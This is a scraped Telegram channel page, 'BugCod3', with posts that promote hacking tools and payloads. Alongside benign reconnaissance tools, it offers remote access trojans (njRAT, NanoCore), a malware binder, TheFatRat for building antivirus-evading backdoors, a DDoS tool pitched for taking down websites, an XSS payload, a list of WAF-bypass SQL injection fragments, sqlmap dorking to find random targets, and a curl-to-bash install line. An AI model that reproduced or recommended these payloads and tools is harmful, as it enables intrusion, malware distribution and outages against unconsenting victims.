BugCod3 – Telegram
BugCod3
6.23K subscribers
308 photos
5 videos
7 files
407 links
ɪɴ ᴛʜᴇ ɴᴀᴍᴇ ᴏꜰ ɢᴏᴅ

[ BugCod3 ] — From Shadows To Shells ⚡️

🕶 Hacking | 🐞 Bug Bounty | 🔐 Security Tools
⚔️ Learn • Hunt • Dominate

🌐 Group: T.me/BugCod3GP
📂 Topic: T.me/BugCod3Topic

🤖 Contact: T.me/BugCod3BOT
📧 Email: BugCod3@protonmail.com
Download Telegram
🌟 zetanize 🌟

HTML Form Parser For Humans

📝 Introduction
It's very easy to make HTTP requests in python, thanks to urllib and requests. However, there was no way to submit HTML forms on the go, well now there is.

🔰 Documentation
from zetanize import zetanize
forms = zetanize(html)

Well that's it! Just feed zetanize a HTML document and it will give you a dict of actionable form data.
Let's parse https://google.com for getting familiar:
from requests import get
from zetanize import zetanize

html = get('https://google.com').text
forms = zetanize(html)

👁 Here's the output:
{
"0": {
"action": "/search",
"inputs": [
{
"type": "hidden",
"name": "ie",
"value": "ISO-8859-1"
},
{
"type": "hidden",
"name": "hl",
"value": "en-IN"
},
{
"type": "hidden",
"name": "source",
"value": "hp"
},
{
"type": "hidden",
"name": "biw",
"value": ""
},
{
"type": "hidden",
"name": "bih",
"value": ""
},
{
"type": "",
"name": "q",
"value": ""
},
{
"type": "submit",
"name": "btnG",
"value": "Google Search"
},
{
"type": "submit",
"name": "btnI",
"value": "I"
},
{
"type": "hidden",
"name": "gbv",
"value": "1"
}
],
"method": "get"
}
}


⬇️ Download
😸 Github

#Mechanize #Html #Parser

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
4
🌟 Photon 🌟

Incredibly fast crawler designed for OSINT

Photon can extract the following data while crawling:
⚪️URLs (in-scope & out-of-scope)
⚪️URLs with parameters (example.com/gallery.php?id=2)
⚪️Intel (emails, social media accounts, amazon buckets etc.)
⚪️Files (pdf, png, xml etc.)
⚪️Secret keys (auth/API keys & hashes)
⚪️JavaScript files & Endpoints present in them
⚪️Strings matching custom regex pattern
⚪️Subdomains & DNS related data


⬇️ Download
😸 Github

#Python #Crawler #Osint #Spider

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2😱2
Xss Payload

<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;”


#Xss #Payload

👤 T.me/BugCod3BOT
📢 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
🌟 Any to Icon 🌟
3.59 converts BMP, JPEG, GIF, PNG, PCX, PSD, TGA, TIFF, WMF, WBMP, XPM, XBM and CUR formats into Windows icons. You can add files and folders from Windows Explorer or other file shells using drag and drop. You also can paste bitmaps from the clipboard and change color resolution and size to create customized icons. It's possible to convert 256-color icons into True Color icons and vice versa.

⬇️ Download

#Anytoicon

👤 T.me/BugCod3BOT
📢 T.me/BugCod3
👍2
🌟 TheFatRat 🌟

🔥 A Massive Exploiting Tool

📝 TheFatRat is an exploiting tool which compiles a malware with famous payload, and then the compiled maware can be executed on Linux , Windows , Mac and Android. TheFatRat Provides An Easy way to create Backdoors and Payload which can bypass most anti-virus.

👁 Features !

🔻Fully Automating MSFvenom & Metasploit.
🔻Local or remote listener Generation.
🔻Easily Make Backdoor by category Operating System.
🔻Generate payloads in Various formats.
🔻Bypass anti-virus backdoors.
🔻File pumper that you can use for increasing the size of your files.
🔻The ability to detect external IP & Interface address .
🔻Automatically creates AutoRun files for USB / CDROM exploitation

▶️ Installation
Instructions on how to install TheFatRat
git clone https://github.com/Screetsec/TheFatRat.git
cd TheFatRat
chmod +x setup.sh && ./setup.sh


😸 Github

#Trojan #Rat #Tools

👤 T.me/BugCod3BOT
📢 T.me/BugCod3
2👎2
𝐇𝐨𝐰 𝐭𝐨 𝐟𝐢𝐧𝐝 𝐚 𝐭𝐚𝐫𝐠𝐞𝐭
𝐚𝐮𝐭𝐨𝐦𝐚𝐭𝐢𝐜𝐚𝐥𝐥𝐲?

SQLMAP
📝SQLmap is an open-source tool used in penetration testing to detect and exploit SQL injection flaws. SQLmap automates the process of detecting and exploiting SQL injection. SQL Injection attacks can take control of databases that utilize SQL.

Installation
Github 👾

🎯 𝘏𝘰𝘸 𝘵𝘰 𝘶𝘴𝘦

To find the target automatically, you must use this command:
If you installed on sudo:sqlmap -g “inurl:”.php?id=”intext:”Example”
if you installed on path:
sqlmap.py -g “inurl:”.php?id=”intext:”Example”

✍️Note:you can add any dork in “

#Tools #dork

👤 T.me/BugCod3BOT
📢 T.me/BugCod3
🔥2
MH Ddos-Dos TOOL

mh ddos-dos tool is one of the best and powerful ddos tools🎃
with 56 methods one of the most powerful ddos tools
if you want do down any web site We suggest you to do it with several systems at the same time.

Installation📝
git clone https://github.com/MatrixTM/MHDDoS.git
cd MHDDoS
pip install -r requirements.txt


#ddos #dos

👤 T.me/BugCod3BOT
📢 T.me/BugCod3
👏4🎉2
🌟 Wifiphisher 🌟

📝
Wifiphisher is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing.

⬇️ Download
🐈 Github

#WifiPhisher #RedTeam #Tools

👤 T.me/BugCod3BOT
📢 T.me/BugCod3
❤‍🔥4
5 important Tools that can use for Bug Hunting Journey or pen-testing process.

Information Gathering or Reconnisence is the most important part of penetration testing.

1:Nmap:Nmap is a free and open-source network mapping tool that can use for network discovery and security auditing
2: Amass:The OWASP Amass tool suite obtains subdomain names by scraping data sources, recursive brute forcing, crawling web archives, permuting/altering names, and reverse DNS sweeping.
3:Dirb:Dirb is a powerful web content scanner tool that can use to find hidden and existing files on the web application
4: Sublist3r:Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT.
5:DNS Recon:DNS Recon is a tool that can use for Domain Name System (DNS) enumeration.


#recon #osint

👤 T.me/BugCod3BOT
📢 T.me/BugCod3
❤‍🔥4🎉2
🌟 njRAT 🌟

📝
NjRAT is a Remote Administration Tool. This repository contains a Njrat Editions.

Use it on virtual machine

⬇️ Download (NjRat 0.7D Danger Edition)
⬇️ Download (NjRat 0.7D Golden Edition)
⬇️ Download (NjRat 0.7D Green Edition)
⬇️ Download (NjRat 0.7D)
⬇️ Download (njRAT Lime Edition )

⬇️ Download (ALL Version)
🐈‍⬛ Github

#njRAT #Tools

👤 T.me/BugCod3BOT
📢 T.me/BugCod3
👍31
Url Fuzzer

If you are bug hunter
You need to fuzz the url to find
Important directory’s this tool is one of the best url fuzz tools

📝Installation
curl -s "https://raw.githubusercontent.com/liamg/scout/master/noscripts/install.sh" | bash


Github🎃

#urlfuzzer #Tools

👤 T.me/BugCod3BOT
📢 T.me/BugCod3
🐭 NanoCore 🐭

⚠️ Use it on virtual machine ⚠️

📝
is a Remote Access Trojan or RAT. This malware is highly customizable with plugins which allow attackers to tailor its functionality to their needs. Nanocore is created with the .NET framework

⬇️ Download

#Rat #Malware #Tools

👤 T.me/BugCod3BOT
📢 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
2
🌟 Celesty Binder 🌟

⚠️ Use it on virtual machine ⚠️

📝
Using this tool, you can insert malicious files into other files

⬇️ Download

#Binder #Tools

👤 T.me/BugCod3BOT
📢 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
5👍2
🌟 Reverse Engineering and exploit development 🌟

⬇️ Download

#Reverse #Engineering

👤 T.me/BugCod3BOT
📢 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
3👍2
Google Dork🥷🏽

this site is one of the best web dork makers
that helps you in BUG BOUNTY

Usage📝
Enter domain of target then press Update domain,
then copy the generated Dorks.


Tool Link🎃

#dork #google_dork

👤 T.me/BugCod3BOT
📢 T.me/BugCod3
3
💀 ImHex 💀

💀 A Hex Editor for Reverse Engineers

⬇️ Download
😸 Github

#Reverse #Engineering

👤 T.me/BugCod3BOT
📢 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
31
⚡️ Flash X ⚡️

⚠️ Use it on virtual machine ⚠️

⬇️ Download

#Scanner

👤 T.me/BugCod3BOT
📢 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
52👍2
SQL Injection Bypass
—————————
if your target have waf you should bypass that to access the database.

Lets start 🥷🏽

ORDER BY —>
/*!50000Order*/by
/*!50000order*//*!50000by*/
/*!50000OrdeR*/By
/*!50000ORDER*//*!50000BY*/
/**A**/Order by
Order/**A**/By
/**/**/ORDER/**/BY/**/**/
Null' order by
O0x72der b0x7920

Union —>
/*!50000union select
/*!50000Union*//*!50000Select*/
/*!12345union*//*!12345select*/
/**A**/union select
union /**A**/ select
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt
%23%0AUnion%23aaaaaaaaaa%0ASelect%23%0A1
+?UnI?On?+'SeL?ECT?

group_concat —>
group_concat(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
unhex(hex(group_concat(table_name)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))

from table_name —>
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!50000frOm*/+/*!50000information_schema*/%252e/**/columns
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -


#sqli #sql_injection

👤 T.me/BugCod3BOT
📢 T.me/BugCod3
6❤‍🔥2👍1
🔫 PROXIES 🔫

🔪20000x UHQ HTTP/S PROXIES

⬇️ Download

#Proxy

👤 T.me/BugCod3BOT
📢 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
22
What is password hashing

About📝
Password hashing turns your password (or any other piece of data) into a short string of letters and/or numbers using an encryption algorithm. If a website is hacked, password hashing helps prevent cybercriminals from getting access to your passwords.

So if you hacked a target and get them user,pass as a hash

So how do we crack these hashes
🥷

Open the link in below and then add your hash in input form then click im not robot and the click crack hash


Note⚠️
This site have 17billion words
Some times it cant crack all the hashes but maybe on future all hashes gone crack.

Web Link👾

#hash #crack

👤 T.me/BugCod3BOT
📢 T.me/BugCod3
👍32🔥2
😈 SQL 😈

👼 Dios Bypass Waf 👼

⬇️ Download

🔒
 BugCod3


#SQL #Dios #Bypass #Waf #POC

👤 T.me/BugCod3BOT
📢 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
21👍1